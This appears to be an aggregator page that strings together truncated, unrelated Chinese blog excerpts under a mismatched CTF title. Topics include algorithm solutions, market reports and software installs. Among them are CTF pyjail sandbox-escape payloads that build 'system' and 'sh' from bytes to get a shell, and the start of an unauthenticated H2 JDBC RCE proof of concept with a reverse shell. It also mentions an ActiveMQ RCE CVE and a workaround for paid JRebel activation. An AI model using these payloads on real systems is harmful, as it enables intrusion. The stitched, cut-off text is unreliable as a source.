misc-lsb一道isctf 2022

之所以加个时间，是因为在找一款合适的富文本编辑器的时候，发现好的多次被转载的帖子中推荐的那些所谓的开源编辑器都已经是付费产品了。 于是耗费了大量时间从google中找了一些开源编辑器，这里简单记一笔。由于找到了够用的之后就没继续找了。 1、https://simditor.tower.im/ #ht ......

WEB: 圣杯战争 !!! （题解：结局别说遗憾 Zn. ） 解题思路：打开题目链接，代码如下： <?php highlight_file(__FILE__); error_reporting(0); class artifact{ public $excalibuer; public $arrow ......

比赛链接 没做完。 A. Coloring 有 \(n\) 个元素，第 \(i\) 个元素有价值 \(w_i\)，颜色 \(c_i\)。给定 \(s\)，初始时只有 \(c_s=1\)，其余 \(c_i\) 均为 \(0\)。 可以进行任意操作：选择一个 \(1 \le i \le n\)，花费 \ ......

更好的阅读体验 P9361 [ICPC2022 Xi'an R] Contests 首先观察一下性质，每个 \(l\) 在每场比赛里一定是对应着某个前缀。 发现题目要求的是最小的满足要求的 \(l\)，最暴力的大概是维护五个指针，每次答案 \(+1\)，然后尝试跳一步，什么时候某个前缀包含了 \(x ......

洛谷传送门 QOJ 传送门 感觉很妙啊，应该不止蓝吧？ 首先一个转化是每次建桥操作就相当于交换两条链的后半部分，可以看看扶苏那篇题解的图。 我们将每个点表示为形如 \((x, y)\) 的二元组表示它初始在第 \(x\) 行第 \(y\) 列，按 \(y\) 为键值排序，那么一次询问就是查询一条链的 ......

报告链接：https://tecdat.cn/?p=33388 原文出处：拓端数据部落公众号 近年来，中国的预制菜行业迅速发展，已成为消费者生活中不可或缺的一部分。研究报告显示，预制菜行业在美国和日本等国家已经发展了很长时间，与中国市场相比，中国的预制菜市场仍有巨大的增长潜力。预制菜行业的蓬勃发展主 ......

Autodesk SketchBook Pro 2022是一款备受推崇的专业插图绘图软件，广泛应用于绘画、设计、插图、动画等多个领域。它凭借其强大的功能和易用性，成为了许多专业人士的首 选绘图工具。 点击获取Autodesk SketchBook Pro 2022 SketchBook Pro 20 ......

LuoguBlog 原题传送门 题意 给定 \(a\) 序列，一个区间的权值为区间 \(\gcd\) 乘上区间和，求长度 \(\ge k\) 的区间的最大权值。 \(1\le n,V\le 10^6\) 题解 区间 \(\gcd\) 相较于区间和更难维护，考虑枚举 \(\gcd\)。 记当前钦定的 ......

下载 下载 jrebel 插件(只能下载 2022.4 版本)，其他版本是需要收费的 安装 中文路径安装 将下载的 文件 解压， 放到另一个全部是英文路径的地方 例如 这个 .jrebel 是激活后生成的， 本来没有很正常 在 idea 中安装插件 修改路径 最后一步激活 地址： https://j ......

参考：2022雷军年度演讲全文：穿越人生低谷的感悟首先，本次演讲我认为是相比以往很不一样的。雷军讲述了自己职业生涯三次低谷，以及面对人生挫折的复盘，可谓是干货满满。另外演讲的过程中不难看出，他的心中永远保持着梦想和热爱，即使过程并不顺利但依然坚持思考，乐观面对，这种力量是直击人心的，瞬间感觉被圈粉。 ......

原文链接：http://tecdat.cn/?p=31970 《报告》以关注新能源汽车内容的网络用户和中国新能源汽车企业为研究对象，选择了与新能源汽车有关的网络内容（图片，直播，视频，用户评价），并与中国新能源汽车产业的生产和销售数据相结合，展开了一项调查。 阅读原文，获取专题报告合集全文，解锁文末 ......

这道题没给附件，直接连上看看 这里一开始用().__class__.__base__.__subclasses__()[-4].__init__.__globals__[bytes([115,121,115,116,101,109]).decode()](bytes([115,104]).decod ......

20231215 NOIP2022 sol + 4道杂题 A. [NOIP2022] 种花 [NOIP2022] 种花 小 C 决定在他的花园里种出 \(\texttt{CCF}\) 字样的图案，因此他想知道 \(\texttt C\) 和 \(\texttt F\) 两个字母各自有多少种种花的方案 ......

查看附件信息 这里禁用了__import__,直接导致了help()函数和breakpoint()函数没法使用，并且还过滤了关键字符，这里考虑python模板注入，但是这里还过滤chr(),这里可以使用bytes函数 payload如下：().__class__.__base__.__subclas ......

打开下载来的附件 这道题比之前那道题多了长度限制，长度不能大于6，所有globals()函数用不了，但还是可以输入help()函数，然后再输入__main__就可以查看当前模块的值 拿到key之后就可以去backdoor函数getshell了 ......

Java 语言有所下降，JavaScript 一直保留在比较的使用水平。 PHP 的颓势已经非常明显了。 Python 一直还保留在比较强势的情况。 https://www.isharkfly.com/t/github-2022/15192/1 ......

原文链接：https://blog.csdn.net/qq_41185868/article/details/81052119 最近开始使用vs2019,应该是最新的版本。之前都是vs2015,感觉19更智能，兼容性更好，速度也更快。详细了解下这几个版本。 1、简介： Microsoft Visua ......

参考：2022雷军年度演讲全文：穿越人生低谷的感悟首先，本次演讲我认为是相比以往很不一样的。雷军讲述了自己职业生涯三次低谷，以及面对人生挫折的复盘，可谓是干货满满。另外演讲的过程中不难看出，他的心中永远保持着梦想和热爱，即使过程并不顺利但依然坚持思考，乐观面对，这种力量是直击人心的，瞬间感觉被圈粉。 ......

Apache ActiveMQ Jolokia 后台远程代码执行漏洞（CVE-2022-41678） Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持java消息服务、集群、Spring Framework等。 Apache ActiveMQ在 ......

你好呀，我是歪歪。 定时任务，大家在开发的过程中肯定都是接触过的。 歪师傅面试的时候关于定时任务一般都会问这样的一个问题：在实际开发的过程中，你们是如何避免定时任务重复执行的呢？ 什么意思呢？ 我给你上个图你就明白了。 假设我们有个订单服务的微服务，它部署在两台机器上： 这是一个再正常不过的部署方案 ......

最近碰到一个奇怪的问题，没找到原因，这里只记录一下现象。 使用vs2022 v142编译的boost库，在链接使用时出错。 libboost_program_options-vc142-mt-s-x32-1_80.lib(options_description.obj) : error LNK201 ......

参与开源项目： 在2022年，我积极参与维护了一个开源项目：春松客服。我在项目中主要负责技术讨论群的建设，包括回答用户的各种提问，解决用户的部署编译问题。与其他开发者的合作，我们成功地将项目推向了一个新的阶段。 通过参与开源项目的建设，我认识了一群志同道合的伙伴，了解了开源项目的建设思路，也理解了开 ......

拿到程序，先查一下保护状态 没开pie，接着看主函数代码逻辑 看到这里，因为程序开了canary，本程序没有可以泄露canary的方法，所以普通的栈溢出方法肯定打不了，这里可以考虑一下smash stack Stack smash 在程序加了 canary 保护之后，如果我们读取的 buffer 覆 ......

由于本人10.17已成功考过CSA，经过两周所学的ansible并结合题库整理出来的CE解析版我也是11月月底就要考了，不过这套解析也是可以满足今年的redhat8题库 文中可能涉及一些命令的参数解释，如有不懂的伙伴可参考我的笔记Ansible ps：一切模板似的题库考试，都需要经过大脑的理解 方可 ......

引： 上周六上午把一道高中的数学竞赛题（一道 8 分的填空题，原题如下图所示）当成一道大题（如上）郑重其事地和孩子以互动的方式探讨了这个题的题解分析. 这是一道出得很好的题. 其题解所涉及的知识不超出高一目前所学内容，因此高一的学生也是可能做得出来的. 但这题是一道很综合的题，涉及的知识点相当多：代 ......

ubuntu22.04安装Goland2022.2.4 自行下载Goland版本 下载goland wget https://download.jetbrains.com/go/goland-2022.2.4.tar.gz ./ 将下载的压缩文件解压到指定目录 sudo tar -zxvf gola ......

2022期末 直角三角形的面积 #include <stdio.h> #include <stdlib.h> #include <math.h> int main() { int a,b,c;scanf("%d%d%d",&a,&b,&c); double p=(a+b+c)/2; double s ......

启动环境： 访问界面 未授权进入POC： jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;\ RCE执行反弹 -创建数据库文件：h2database.sql CREA ......

报告链接：http://tecdat.cn/?p=32044 近年来，我国的跨境电子商务发展迅速，在过去五年中，其贸易额增长率达到了16.2%，已经成为稳定对外贸易的一支重要力量。 阅读原文，获取专题报告合集全文，解锁文末52份跨境电商行业相关报告。 一方面，随着跨境电子商务的发展，跨境电子商务的监 ......

P8818 [CSP-S 2022] 策略游戏 题解 题目链接 P8818 [CSP-S 2022] 策略游戏 简化题意 小 \(A\) 先在 \(a[l1,r1]\) 中选择一个数 \(x\)，小 \(B\) 再在 \(b[l2,r2]\) 中选择一个数 \(y\)，最后的分数就是 \(x \ti ......